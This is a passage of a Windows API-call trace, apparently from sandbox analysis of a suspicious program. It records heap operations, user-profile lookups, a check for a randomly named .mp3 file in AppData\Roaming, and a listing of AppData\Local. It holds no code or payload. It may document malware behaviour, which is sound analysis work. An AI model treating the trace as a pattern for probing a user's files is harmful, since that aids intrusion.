lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.647] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24f1fe0 [0207.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/_J3DS1U3FLV.mp3", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_J3DS1U3FLV.mp3", lpFilePart=0x8bf658*="_J3DS1U3FLV.mp3") returned 0x3d [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0207.649] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\_J3DS1U3FLV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\_j3ds1u3flv.mp3")) returned 0xffffffff [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.649] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0207.649] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0207.649] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0207.649] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0207.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0207.649] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0207.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0207.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.650] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.651] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf2c0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0207.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.651] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.651] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0207.651] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.651] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0207.652] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.652] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.652] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.653] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.653] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0207.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffb003f, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0xaa5760 [0207.654] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffb003f, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0207.654] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffb003f, dwReserved1=0x60, cFileName="Adobe", cAlternateFileName="")) returned 1 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0207.654] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.654] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.654] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.654] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.654] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.655] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.655] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.655] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.655] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x25c6e50, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36c0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.656] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.656] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.656] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.656] RtlAllocateHeap (HeapHandle=0x25c0000, 